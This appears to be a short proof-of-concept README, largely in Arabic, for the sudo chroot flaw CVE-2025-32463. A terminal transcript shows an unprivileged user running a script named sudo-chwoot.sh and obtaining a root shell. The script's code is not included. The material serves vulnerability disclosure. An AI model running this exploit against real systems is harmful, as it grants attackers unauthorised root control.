
إثبات المفهوم لثغرة CVE-2025-32463، يُظهر تصعيد الامتيازات من مستخدم غير مميز إلى شل جذر خارج بيئة chroot عبر ثغرة في sudo.
Reference: https://www.stratascale.com/vulnerability-alert-CVE-2025-32463-sudo-chroot
تؤدي تنفيذ PoC على خادم Ubuntu 24.04.2 LTS مع Sudo v1.9.15p5، باستخدام مستخدم غير مميز وبدون قواعد Sudo محددة، إلى الحصول على غلاف جذر (root shell) خارج البيئة المعزولة (chrooted).
lowpriv@prod:/CVE-2025-32463$ id
uid=1001(lowpriv) gid=1001(lowpriv) groups=1001(lowpriv)
lowpriv@prod:/CVE-2025-32463$ sudo -l
[sudo] password for lowpriv:
Sorry, user lowpriv may not run sudo on prod.
lowpriv@prod:~/CVE-2025-32463$ ./sudo-chwoot.sh
woot!
root@prod:/# id
uid=0(root) gid=0(root) groups=0(root),1001(lowpriv)